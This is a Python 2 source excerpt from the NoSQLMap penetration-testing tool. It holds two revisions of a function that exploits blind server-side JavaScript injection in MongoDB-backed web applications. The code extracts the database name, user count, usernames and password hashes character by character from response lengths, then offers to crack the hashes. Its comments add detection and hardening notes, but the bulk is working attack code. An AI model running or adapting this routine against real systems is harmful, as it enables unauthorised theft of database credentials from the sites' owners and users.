파일: nsmweb.py 프로젝트: skymysky/NoSQLMap
def getDBInfo():
    """Recover the current database name and, on request, user:hash pairs
    through a blind, boolean-based server-side JavaScript injection point.

    Module-level state used but not defined here: ``uriArray[16]`` (a request
    URI holding the literal marker ``---`` where JavaScript is spliced in),
    ``requestHeaders``, ``getResponseBodyHandlingErrors`` and ``nsmmongo``.
    Every probe is a yes/no question: the injected snippet returns ``true``
    when the guess is right, and the answer is read off the response body
    length by comparing it with a baseline "always true" request.  One HTTP
    request is spent per candidate length and per (position, character) pair.

    Interactive (``raw_input``, Python 2) and returns ``None``; recovered
    values are printed, not returned.

    Defender notes: the on-the-wire signature is a long burst of otherwise
    identical requests whose only variation is an incrementing integer or a
    single quoted character inside ``db.getName()`` / ``db.system.users``
    snippets, with responses alternating between two fixed sizes.  The
    primitive only exists when request input reaches server-side JavaScript
    evaluation; keep server-side JS disabled where it is not needed and never
    concatenate request parameters into server-side code.

    Raises IndexError when a character outside ``chars`` is met (there is no
    bound check on the alphabet index) or when the menu choice is out of
    range, and ValueError on a non-numeric menu choice.
    """
    # Loop/progress state.  Several names are never read (nameLen, gotFullDb,
    # gotColLen, gotColName, finUser, query) -- leftovers from other code paths.
    curLen = 0
    nameLen = 0
    gotFullDb = False
    gotNameLen = False
    gotDbName = False
    gotColLen = False
    gotColName = False
    gotUserCnt = False
    finUser = False
    dbName = ""
    charCounter = 0
    nameCounter = 0
    usrCount = 0
    retrUsers = 0
    users = []
    hashes = []
    crackHash = ""

    # Guess alphabet: [A-Za-z0-9] only.  Any other character in a name can
    # never match, and because the search loops below never check the index
    # against len(chars), such a name ends in IndexError rather than a clean
    # "not found".
    chars = string.ascii_letters + string.digits
    print "Getting baseline True query return size..."
    # Baseline oracle: an unconditional "return true" payload.  Every later
    # probe is judged solely by whether its body length equals this value, so
    # any response-size jitter (dynamic content, same-sized error pages)
    # produces wrong characters without any error being raised.
    trueUri = uriArray[16].replace("---", "return true; var dummy ='!" + "&")
    #print "Debug " + str(trueUri)
    req = urllib2.Request(trueUri, None, requestHeaders)
    baseLen = int(len(getResponseBodyHandlingErrors(req)))
    print "Got baseline true query length of " + str(baseLen)

    print "Calculating DB name length..."

    # Linear search on the name length, one request per candidate, starting
    # at 0.  Never terminates if no length reproduces the baseline size.
    while gotNameLen == False:
        calcUri = uriArray[16].replace(
            "---", "var curdb = db.getName(); if (curdb.length ==" +
            str(curLen) + ") {return true;} var dum='a" + "&")
        #print "Debug: " + calcUri
        req = urllib2.Request(calcUri, None, requestHeaders)
        lenUri = int(len(getResponseBodyHandlingErrors(req)))
        #print "Debug length: " + str(lenUri)

        if lenUri == baseLen:
            print "Got database name length of " + str(curLen) + " characters."
            gotNameLen = True

        else:
            curLen += 1

    # Position-by-position character search; nameCounter is the position,
    # charCounter the alphabet index.  dbName is accumulated but only ever
    # echoed here -- nothing below reads it.
    print "Database Name: ",
    while gotDbName == False:
        charUri = uriArray[16].replace(
            "---", "var curdb = db.getName(); if (curdb.charAt(" +
            str(nameCounter) + ") == '" + chars[charCounter] +
            "') { return true; } var dum='a" + "&")

        req = urllib2.Request(charUri, None, requestHeaders)
        lenUri = int(len(getResponseBodyHandlingErrors(req)))

        if lenUri == baseLen:
            dbName = dbName + chars[charCounter]
            print chars[charCounter],
            nameCounter += 1
            charCounter = 0

            if nameCounter == curLen:
                gotDbName = True

        else:
            charCounter += 1
    print "\n"

    getUserInf = raw_input("Get database users and password hashes (y/n)? ")

    if getUserInf.lower() == "y":
        charCounter = 0
        nameCounter = 0
        # find the total number of users on the database (same linear search
        # as the name length, against db.system.users.count())
        while gotUserCnt == False:
            usrCntUri = uriArray[16].replace(
                "---", "var usrcnt = db.system.users.count(); if (usrcnt == " +
                str(usrCount) + ") { return true; } var dum='a")

            req = urllib2.Request(usrCntUri, None, requestHeaders)
            lenUri = int(len(getResponseBodyHandlingErrors(req)))

            if lenUri == baseLen:
                print "Found " + str(usrCount) + " user(s)."
                gotUserCnt = True

            else:
                usrCount += 1

        usrChars = 0  # total number of characters in username
        charCounterUsr = 0  # position in the character array-Username
        rightCharsUsr = 0  # number of correct characters-Username
        rightCharsHash = 0  # number of correct characters-hash
        charCounterHash = 0  # position in the character array-hash
        username = ""
        pwdHash = ""
        charCountUsr = False
        query = "{}"

        # One iteration per user.  The first user is read with an unfiltered
        # findOne(); every later one with findOne({user:{$nin: <names so far>}})
        # so the document returned changes as names are recovered.  The two
        # branches are near-duplicates that differ only in that filter.
        while retrUsers < usrCount:
            if retrUsers == 0:
                while charCountUsr == False:
                    # different query to get the first user vs. others
                    usrUri = uriArray[16].replace(
                        "---",
                        "var usr = db.system.users.findOne(); if (usr.user.length == "
                        + str(usrChars) + ") { return true; } var dum='a" +
                        "&")

                    req = urllib2.Request(usrUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))

                    if lenUri == baseLen:
                        # Got the right number of characters
                        charCountUsr = True

                    else:
                        usrChars += 1

                while rightCharsUsr < usrChars:
                    usrUri = uriArray[16].replace(
                        "---",
                        "var usr = db.system.users.findOne(); if (usr.user.charAt("
                        + str(rightCharsUsr) + ") == '" +
                        chars[charCounterUsr] +
                        "') { return true; } var dum='a" + "&")

                    req = urllib2.Request(usrUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))

                    if lenUri == baseLen:
                        username = username + chars[charCounterUsr]
                        #print username
                        rightCharsUsr += 1
                        charCounterUsr = 0

                    else:
                        charCounterUsr += 1

                retrUsers += 1
                users.append(username)
                # reinitialize all variables and get ready to do it again
                #print str(retrUsers)
                #print str(users)
                charCountUsr = False
                rightCharsUsr = 0
                usrChars = 0
                username = ""

                # The hash is assumed to be exactly 32 characters from the
                # [A-Za-z0-9] alphabet.  NOTE(review): that matches a hex MD5
                # as stored by the legacy MONGODB-CR scheme; other credential
                # formats would not be recovered correctly -- confirm against
                # the deployment's auth mechanism.
                while rightCharsHash < 32:  #Hash length is static
                    hashUri = uriArray[16].replace(
                        "---",
                        "var usr = db.system.users.findOne(); if (usr.pwd.charAt("
                        + str(rightCharsHash) + ") == '" +
                        chars[charCounterHash] +
                        "') { return true; } var dum='a" + "&")

                    req = urllib2.Request(hashUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))

                    if lenUri == baseLen:
                        pwdHash = pwdHash + chars[charCounterHash]
                        #print pwdHash
                        rightCharsHash += 1
                        charCounterHash = 0

                    else:
                        charCounterHash += 1

                hashes.append(pwdHash)
                # First branch only ever runs for the first user, hence [0].
                print "Got user:hash " + users[0] + ":" + hashes[0]
                # reinitialize all variables and get ready to do it again
                charCounterHash = 0
                rightCharsHash = 0
                pwdHash = ""
            else:
                # str(users) embeds Python's list repr as a JS array literal.
                # NOTE(review): that only stays valid syntax for plain ASCII
                # names without quotes -- verify for other inputs.
                while charCountUsr == False:
                    # different query to get the first user vs. others
                    usrUri = uriArray[16].replace(
                        "---",
                        "var usr = db.system.users.findOne({user:{$nin:" +
                        str(users) + "}}); if (usr.user.length == " +
                        str(usrChars) + ") { return true; } var dum='a" + "&")

                    req = urllib2.Request(usrUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))

                    if lenUri == baseLen:
                        # Got the right number of characters
                        charCountUsr = True

                    else:
                        usrChars += 1

                while rightCharsUsr < usrChars:
                    usrUri = uriArray[16].replace(
                        "---",
                        "var usr = db.system.users.findOne({user:{$nin:" +
                        str(users) + "}}); if (usr.user.charAt(" +
                        str(rightCharsUsr) + ") == '" + chars[charCounterUsr] +
                        "') { return true; } var dum='a" + "&")

                    req = urllib2.Request(usrUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))

                    if lenUri == baseLen:
                        username = username + chars[charCounterUsr]
                        #print username
                        rightCharsUsr += 1
                        charCounterUsr = 0

                    else:
                        charCounterUsr += 1

                retrUsers += 1
                # reinitialize all variables and get ready to do it again
                # (username is deliberately kept until after the hash loop,
                # so the $nin filter there still excludes only earlier users)

                charCountUsr = False
                rightCharsUsr = 0
                usrChars = 0

                # Same fixed-32-character assumption as in the first-user branch.
                while rightCharsHash < 32:  #Hash length is static
                    hashUri = uriArray[16].replace(
                        "---",
                        "var usr = db.system.users.findOne({user:{$nin:" +
                        str(users) + "}}); if (usr.pwd.charAt(" +
                        str(rightCharsHash) + ") == '" +
                        chars[charCounterHash] +
                        "') { return true; } vardum='a" + "&")

                    req = urllib2.Request(hashUri, None, requestHeaders)
                    lenUri = int(len(getResponseBodyHandlingErrors(req)))

                    if lenUri == baseLen:
                        pwdHash = pwdHash + chars[charCounterHash]
                        rightCharsHash += 1
                        charCounterHash = 0

                    else:
                        charCounterHash += 1

                users.append(username)
                hashes.append(pwdHash)
                print "Got user:hash " + users[retrUsers -
                                               1] + ":" + hashes[retrUsers - 1]
                # reinitialize all variables and get ready to do it again
                username = ""
                charCounterHash = 0
                rightCharsHash = 0
                pwdHash = ""
    # Optional offline cracking via the project-local nsmmongo.passCrack.
    # The menu is 1-based; an entry of 0 silently maps to index -1 (the last
    # user), an out-of-range number raises IndexError and non-numeric input
    # raises ValueError -- none of these are caught here.
    crackHash = raw_input("Crack recovered hashes (y/n)?:  ")

    while crackHash.lower() == "y":
        menuItem = 1
        for user in users:
            print str(menuItem) + "-" + user
            menuItem += 1

        userIndex = raw_input("Select user hash to crack: ")
        nsmmongo.passCrack(users[int(userIndex) - 1],
                           hashes[int(userIndex) - 1])

        crackHash = raw_input("Crack another hash (y/n)?")
    raw_input("Press enter to continue...")
    return
def getDBInfo():
	"""Recover the current database name and, on request, user:hash pairs
	through a blind, boolean-based server-side JavaScript injection point.

	Earlier revision of the same routine: requests go straight through
	``urllib.urlopen(...).read()`` with no error handling, so any transport or
	HTTP failure surfaces as an uncaught exception and aborts the run.  Relies
	on module-level state not defined here: ``uriArray[16]`` (a request URI
	holding the literal marker ``---`` where JavaScript is spliced in),
	``yes_tag`` (the accepted affirmative answers) and ``nsmmongo``.

	Every probe is a yes/no question: the injected snippet returns ``true``
	when the guess is right, and the answer is read off the response body
	length by comparing it with a baseline "always true" request.  One HTTP
	request is spent per candidate length and per (position, character) pair.
	Interactive (``raw_input``, Python 2) and returns ``None``.

	Defender notes: the traffic signature is a long burst of otherwise identical
	requests whose only variation is an incrementing integer or a single quoted
	character inside ``db.getName()`` / ``db.system.users`` snippets, with
	responses alternating between two fixed sizes.  The primitive only exists
	when request input reaches server-side JavaScript evaluation; keep
	server-side JS disabled where it is not needed and never concatenate
	request parameters into server-side code.

	Raises IndexError when a character outside ``chars`` is met (no bound check
	on the alphabet index) or when the menu choice is out of range, and
	ValueError on a non-numeric menu choice.
	"""
	# Loop/progress state.  nameLen, gotFullDb, gotColLen, gotColName, finUser
	# and query are assigned but never read.
	curLen = 0
	nameLen = 0
	gotFullDb = False
	gotNameLen = False
	gotDbName = False
	gotColLen = False
	gotColName = False
	gotUserCnt = False
	finUser = False
	dbName = ""
	charCounter = 0
	nameCounter = 0
	usrCount = 0
	retrUsers = 0
	users = []
	hashes = []
	crackHash = ""
	
	# Guess alphabet: [A-Za-z0-9] only.  A name containing anything else can
	# never match, and since the loops never compare the index with len(chars)
	# the run ends in IndexError instead of a clean "not found".
	chars = string.ascii_letters + string.digits
	print "Getting baseline True query return size..."
	# Baseline oracle: an unconditional "return true" payload.  All later
	# probes are judged only by whether their body length equals this value,
	# so response-size jitter silently yields wrong characters.
	trueUri = uriArray[16].replace("---","return true; var dummy ='!" + "&")
	#print "Debug " + str(trueUri)
	baseLen = int(len(urllib.urlopen(trueUri).read()))
	print "Got baseline true query length of " + str(baseLen)
	
	print "Calculating DB name length..."
	
	# Linear search on the name length from 0 upward, one request per
	# candidate; never terminates if no length reproduces the baseline size.
	while gotNameLen == False:
		calcUri = uriArray[16].replace("---","var curdb = db.getName(); if (curdb.length ==" + str(curLen) + ") {return true;} var dum='a" + "&")
		#print "Debug: " + calcUri
		lenUri = int(len(urllib.urlopen(calcUri).read()))
		#print "Debug length: " + str(lenUri)
		
		if lenUri == baseLen:
			print "Got database name length of " + str(curLen) + " characters."
			gotNameLen = True
		
		else:
			curLen += 1
	
	# Position-by-position character search: nameCounter is the position,
	# charCounter the alphabet index.  dbName is accumulated but only echoed.
	print "Database Name: ", 		
	while gotDbName == False:
		charUri = uriArray[16].replace("---","var curdb = db.getName(); if (curdb.charAt(" + str(nameCounter) + ") == '"+ chars[charCounter] + "') { return true; } var dum='a" + "&")
		lenUri = int(len(urllib.urlopen(charUri).read()))

		if lenUri == baseLen:
			dbName = dbName + chars[charCounter]
			print chars[charCounter],
			nameCounter += 1
			charCounter = 0
			
			if nameCounter == curLen:
				gotDbName = True
			
		
		else:
			charCounter += 1
	print "\n"
	
	getUserInf = raw_input("Get database users and password hashes (y/n)? ")
	
	if getUserInf in yes_tag:
		charCounter = 0
		nameCounter = 0
		#find the total number of users on the database (same linear search
		#as the name length, against db.system.users.count())
		while gotUserCnt == False:
			usrCntUri = uriArray[16].replace("---","var usrcnt = db.system.users.count(); if (usrcnt == " + str(usrCount) + ") { return true; } var dum='a")
			lenUri = int(len(urllib.urlopen(usrCntUri).read()))
		
			if lenUri == baseLen:
				print "Found " + str(usrCount) + " user(s)."
				gotUserCnt = True
			
			else:
				usrCount += 1
		
		usrChars = 0  #total number of characters in username
		charCounterUsr = 0 #position in the character array-Username
		rightCharsUsr = 0 #number of correct characters-Username
		rightCharsHash = 0 #number of correct characters-hash
		charCounterHash = 0 #position in the character array-hash
		username = ""
		pwdHash = ""
		charCountUsr = False
		query = "{}"
		
		#One iteration per user.  The first user is read with an unfiltered
		#findOne(); later ones with findOne({user:{$nin: <names so far>}}).
		#The two branches are near-duplicates differing only in that filter.
		while retrUsers < usrCount:
			if retrUsers == 0:
				while charCountUsr == False:
					#different query to get the first user vs. others
					usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&")
					lenUri = int(len(urllib.urlopen(usrUri).read()))
				
					if lenUri == baseLen:
						#Got the right number of characters
						charCountUsr = True
				
					else:
						usrChars += 1
					
				while  rightCharsUsr < usrChars:
					usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '"+ chars[charCounterUsr] + "') { return true; } var dum='a" + "&")
					lenUri = int(len(urllib.urlopen(usrUri).read()))
						
					if lenUri == baseLen:
						username = username + chars[charCounterUsr]
						#print username
						rightCharsUsr += 1
						charCounterUsr = 0				
				
					else:
						charCounterUsr += 1
				
				retrUsers += 1
				users.append(username)
				#reinitialize all variables and get ready to do it again
				#print str(retrUsers)
				#print str(users)
				charCountUsr = False
				rightCharsUsr = 0
				usrChars = 0
				username = ""
				
				#The hash is assumed to be exactly 32 characters from the
				#[A-Za-z0-9] alphabet.  NOTE(review): that matches a hex MD5 as
				#stored by the legacy MONGODB-CR scheme; other credential formats
				#would not be recovered correctly -- confirm against the target's
				#auth mechanism.
				while rightCharsHash < 32:  #Hash length is static
					hashUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '"+ chars[charCounterHash] + "') { return true; } var dum='a" + "&")
					lenUri = int(len(urllib.urlopen(hashUri).read()))
						
					if lenUri == baseLen:
						pwdHash = pwdHash + chars[charCounterHash]
						#print pwdHash
						rightCharsHash += 1
						charCounterHash = 0
							
					else:
						charCounterHash += 1
						
				hashes.append(pwdHash)
				#This branch only runs for the first user, hence index 0.
				print "Got user:hash " + users[0] + ":" + hashes[0]
				#reinitialize all variables and get ready to do it again
				charCounterHash = 0
				rightCharsHash = 0
				pwdHash = ""
			else:
				#str(users) embeds Python's list repr as a JS array literal.
				#NOTE(review): only valid syntax for plain ASCII names without
				#quotes -- verify for other inputs.
				while charCountUsr == False:
					#different query to get the first user vs. others
					usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&")
					lenUri = int(len(urllib.urlopen(usrUri).read()))
				
					if lenUri == baseLen:
						#Got the right number of characters
						charCountUsr = True
				
					else:
						usrChars += 1
					
				while  rightCharsUsr < usrChars:
					usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '"+ chars[charCounterUsr] + "') { return true; } var dum='a" + "&")	
					lenUri = int(len(urllib.urlopen(usrUri).read()))
						
					if lenUri == baseLen:
						username = username + chars[charCounterUsr]
						#print username
						rightCharsUsr += 1
						charCounterUsr = 0				
				
					else:
						charCounterUsr += 1
				
				retrUsers += 1
				#reinitialize all variables and get ready to do it again
				#(username is kept until after the hash loop so the $nin filter
				#there still excludes only the earlier users)
				
				charCountUsr = False
				rightCharsUsr = 0
				usrChars = 0
				
				#Same fixed-32-character assumption as in the first-user branch.
				while rightCharsHash < 32:  #Hash length is static
					hashUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '"+ chars[charCounterHash] + "') { return true; } vardum='a" + "&")
					lenUri = int(len(urllib.urlopen(hashUri).read()))
						
					if lenUri == baseLen:
						pwdHash = pwdHash + chars[charCounterHash]
						rightCharsHash += 1
						charCounterHash = 0
							
					else:
						charCounterHash += 1
						
				users.append(username)
				hashes.append(pwdHash)
				print "Got user:hash " + users[retrUsers-1] + ":" + hashes[retrUsers-1]
				#reinitialize all variables and get ready to do it again
				username = ""
				charCounterHash = 0
				rightCharsHash = 0
				pwdHash = ""
	#Optional offline cracking via the project-local nsmmongo.passCrack.  The
	#menu is 1-based: an entry of 0 silently maps to index -1 (the last user),
	#an out-of-range number raises IndexError and non-numeric input raises
	#ValueError -- none are caught here.
	crackHash = raw_input("Crack recovered hashes (y/n)?:  ")		
		
	while crackHash in yes_tag:
		menuItem = 1
		for user in users:
			print str(menuItem) + "-" + user
			menuItem +=1
				
		userIndex = raw_input("Select user hash to crack: ")
		nsmmongo.passCrack(users[int(userIndex)-1],hashes[int(userIndex)-1])
		
		crackHash = raw_input("Crack another hash (y/n)?")		
	raw_input("Press enter to continue...")
	return